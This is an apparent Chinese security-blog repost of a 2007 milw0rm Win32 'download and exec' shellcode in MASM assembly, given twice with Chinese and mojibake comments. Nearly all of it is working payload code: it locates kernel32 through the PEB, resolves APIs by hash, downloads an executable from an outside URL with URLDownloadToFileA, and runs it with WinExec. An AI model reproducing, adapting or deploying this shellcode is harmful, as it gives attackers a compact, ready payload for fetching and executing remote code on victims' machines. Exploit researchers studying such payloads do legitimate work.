Win32 Down and Exec Shellcode 192 bytes

  • A+
所属分类:lcx

Win32 Tiny Download and Exec Shellcode 192 bytes,微型下载执行ShellCode:

    这是czy出品的,最早在whitecell里面发表,后来发表到了milw0rm上。一共192字节,不存在124字节那个shellcode所说的问题,这个shellcode应该是公布出来最小的下载运行shellcode了。文中的问号,是因为那是外文,没装外文字库,无法显示,没影响,那个只是注释,有没有无所谓。

2007-06-27 win32 Tiny Download and Exec Shellcode 192 bytes 71599 R  D   czy 

中文注释版:

;header 163=61(16+8+9+(28))+95(68+27)+17
;163+19=192
comment %
            #--------------------------------------#
            #   Tiny Download&&Exec ShellCode-->   #
            # -->size 192                          #
            #                   2007.06.01         #
            #                    codz: czy         #
            #--------------------------------------#
 
system :test on ie6+XPSP2/2003SP2/2kSP4
%
.586
.model flat,stdcall
option casemap:none

include     C:RadASMmasm32includewindows.inc
include     C:RadASMmasm32includekernel32.inc
includelib   C:RadASMmasm32libkernel32.lib
include     C:RadASMmasm32includeuser32.inc
includelib   C:RadASMmasm32libuser32.lib

.data
shelldatabuffer db 1024 dup(0)
shellcodebuffer db 2046 dup(0)
downshell db 'down exploit',0
txtname db 'c:officeunicode.doc',0

.code
start:
invoke MessageBoxA,0,offset downshell,offset downshell,1
invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256
mov eax,offset shellcodebuffer
jmp eax
somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;上面的代码是把在代码段中的shellcode移动数据段中执行,模拟真实的shellcode执行环境
@@shellcodebegin:
call @@beginaddr
@@beginaddr:
PUSH 03H    ;要调用的API函数个数
jmp @@realshellcode      
myExitProcess     dd 073e2d87eh
myWinExec       dd 00e8afe98h
myLoadLibraryA dd 0ec0e4e8eh
dll             db 'URLMON',0,0
myUrlDownFile     dd 0702f1a36h
path              db 'c:a.exe',0
url             db 'https://lcx.cc/calc.exe',0

 

@@realshellcode:
POP ECX
POP EDI
SCASD ;edi+4
;得到kernel32.dll基地址
db   67h,64h,0A1h,30h,00h
mov eax, [eax+0cH]
mov esi, [eax+1cH]
lodsd
mov ebp, [eax+08H]       ;EBP中存放kernel32.dll的基地址
;处理导出表
@@next2:
PUSH    ECX
@@next3:
MOV    ESI,[EBP+3Ch]
MOV    ESI,[EBP+ESI+78h]
ADD    ESI,EBP
PUSH    ESI
MOV    ESI,[ESI+20h]
ADD    ESI,EBP
XOR    ECX,ECX
DEC    ECX
@@next:
INC    ECX
LODSD
ADD    EAX,EBP
XOR    EBX,EBX
@@again:
MOVSX     EDX,BYTE PTR [EAX]
CMP    DL,DH
JZ        @@end
ROR    EBX,0Dh
ADD    EBX,EDX
INC    EAX
JMP    @@again
@@end:
CMP    EBX,[EDI]
JNZ    @@next

POP    ESI
MOV    EBX,[ESI+24h]
ADD    EBX,EBP
MOV    CX,WORD PTR [ECX*2+EBX]
MOV    EBX,[ESI+1Ch]
ADD    EBX,EBP
MOV    EAX,[ECX*4+EBX]
ADD    EAX,EBP
STOSD
POP    ECX
loop @@next2

mov ecx,[edi] ;2
cmp cl,'c'    ;3
jz @@downfile ;2
PUSH EDI
CALL EAX      ;2
xchg eax,ebp
scasd
scasd
push 01       ;2第二个DLL的函数个数
jmp @@next3   ;2;总计17

     
@@downfile:
push edx   ;0
push edx   ;0
push edi   ;file=c:a.exe
lea     ecx, dword ptr [edi+9h]
push ecx   ;url
push edx   ;0
call eax   ;URLDownloadToFileA,0,url,file=c:a.exe,0,0

push 1 ;FOR TEST
push edi
call dword ptr [edi-14H] ;winexec,'c:xxx.exe',1
call dword ptr [edi-18H] ;Exitprocess
somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
invoke ExitProcess,0
end start

; milw0rm.com [2007-06-27]

-------------------------------------------------------------------------------------------

原始外文注释版:

;Tiny Download&&Exec ShellCode codz czy 2007.6.1
;header 163=61(16+8+9+(28))+95(68+27)+17
;163+19=192
comment %
                #--------------------------------------#          #
              #  Tiny Download&&Exec ShellCode-->       #       #
            #    -->size 192                              #   #
          #                      2007.06.01                 # 
            #                    codz: czy                #   #
            #                  www.ph4nt0m.org           #     #
             #------------------------------------------#       #

system :test on ie6+XPSP2/2003SP2/2kSP4
%
.586
.model flat,stdcall
option casemap:none

include     c:masm32includewindows.inc
include     c:masm32includekernel32.inc
includelib  c:masm32libkernel32.lib
include     c:masm32includeuser32.inc
includelib  c:masm32libuser32.lib

.data
shelldatabuffer db 1024 dup(0)
shellcodebuffer db 2046 dup(0)
downshell db 'down exploit',0
.code
start:
 invoke MessageBoxA,0,offset downshell,offset downshell,1
 invoke RtlMoveMemory,offset shellcodebuffer,00401040H,256
 mov eax,offset shellcodebuffer
 jmp eax
 somenops db 90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h,90h
;???‰???????????|???μ???????′???o???????????????????°???‘???”???????′???o???????????????????–???????μ????shellcode???’???????????ˉ???????????????????????????–???????–???′???????????£???????????£???????¢???????|???????μ???μ????shellcode???–???′???????????????·???????3 
@@shellcodebegin:  
 call @@beginaddr
@@beginaddr:
 PUSH 03H      ;???’???a???μ???·???“???????μ????API???o???ˉ????????????????????????
 jmp @@realshellcode         
myExitProcess     dd 073e2d87eh  
myWinExec         dd 00e8afe98h   
myLoadLibraryA    dd 0ec0e4e8eh
dll               db 'URLMON',0,0
myUrlDownFile     dd 0702f1a36h
path              db 'c:a.exe',0
url               db 'http://www.ph4nt0m.org/a.exe',0

 

@@realshellcode:
    POP ECX
    POP EDI
    SCASD ;edi+4
;???μ???????μ????kernel32.dll???????1???μ???????–???·
db  67h,64h,0A1h,30h,00h
 mov eax, [eax+0cH]
 mov esi, [eax+1cH]
    lodsd
 mov ebp, [eax+08H]          ;EBP???–???????′???|???·???…kernel32.dll???μ???????????1???μ???????–???·
;???′???|???€???-???μ???????3???????±???-
@@next2:
PUSH      ECX
@@next3:
MOV       ESI,[EBP+3Ch]
MOV       ESI,[EBP+ESI+78h]
ADD       ESI,EBP
PUSH      ESI
MOV       ESI,[ESI+20h]
ADD       ESI,EBP
XOR       ECX,ECX
DEC       ECX
@@next:
INC       ECX
LODSD
ADD       EAX,EBP
XOR       EBX,EBX
@@again:
    MOVSX     EDX,BYTE PTR [EAX]
    CMP       DL,DH
    JZ        @@end
    ROR       EBX,0Dh
    ADD       EBX,EDX
    INC       EAX
    JMP       @@again
@@end:
CMP       EBX,[EDI]
JNZ       @@next

POP       ESI
MOV       EBX,[ESI+24h]
ADD       EBX,EBP
MOV       CX,WORD PTR [ECX*2+EBX]
MOV       EBX,[ESI+1Ch]
ADD       EBX,EBP
MOV       EAX,[ECX*4+EBX]
ADD       EAX,EBP
STOSD
POP       ECX
loop @@next2

mov ecx,[edi]   ;2
cmp cl,'c'      ;3
jz @@downfile   ;2
PUSH EDI
CALL EAX        ;2
xchg eax,ebp
scasd
scasd
push 01         ;2???μ????????????????????DLL???μ???????o???ˉ????????????????????????
jmp @@next3     ;2
                ;???—????????????17

        
@@downfile:

 push edx  ;0
 push edx  ;0
 push    edi  ;file=c:a.exe
 lea     ecx, dword ptr [edi+9h]
 push    ecx  ;url
 push edx  ;0
 call eax  ;URLDownloadToFileA,0,url,file=c:a.exe,0,0
 
 
 push 1 ;FOR TEST
 push edi
 call dword ptr [edi-14H] ;winexec,'c:xxx.exe',1
 
    call dword ptr [edi-18H] ;Exitprocess

    somenops2 db 90h,90h,90h,90h,90h,90h,90h,90h,90h
    invoke ExitProcess,0
end start

; milw0rm.com [2007-06-27]

文章来源于lcx.cc:Win32 Down and Exec Shellcode 192 bytes

相关推荐: 黑阔大牛来说一说切实可行的匿名上网方法

黑阔大牛来说一说切实可行的匿名上网 clzzy (南无阿弥陀佛) | 2014-01-21 11:43 说到保护隐私,匿名上网,乱七八糟方法很多,要么过于繁琐实际操作难度很大,要么不安全。安全和方便不可兼得这是实话。 根据鄙人在公安队伍混了几年的经验来看,只要…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: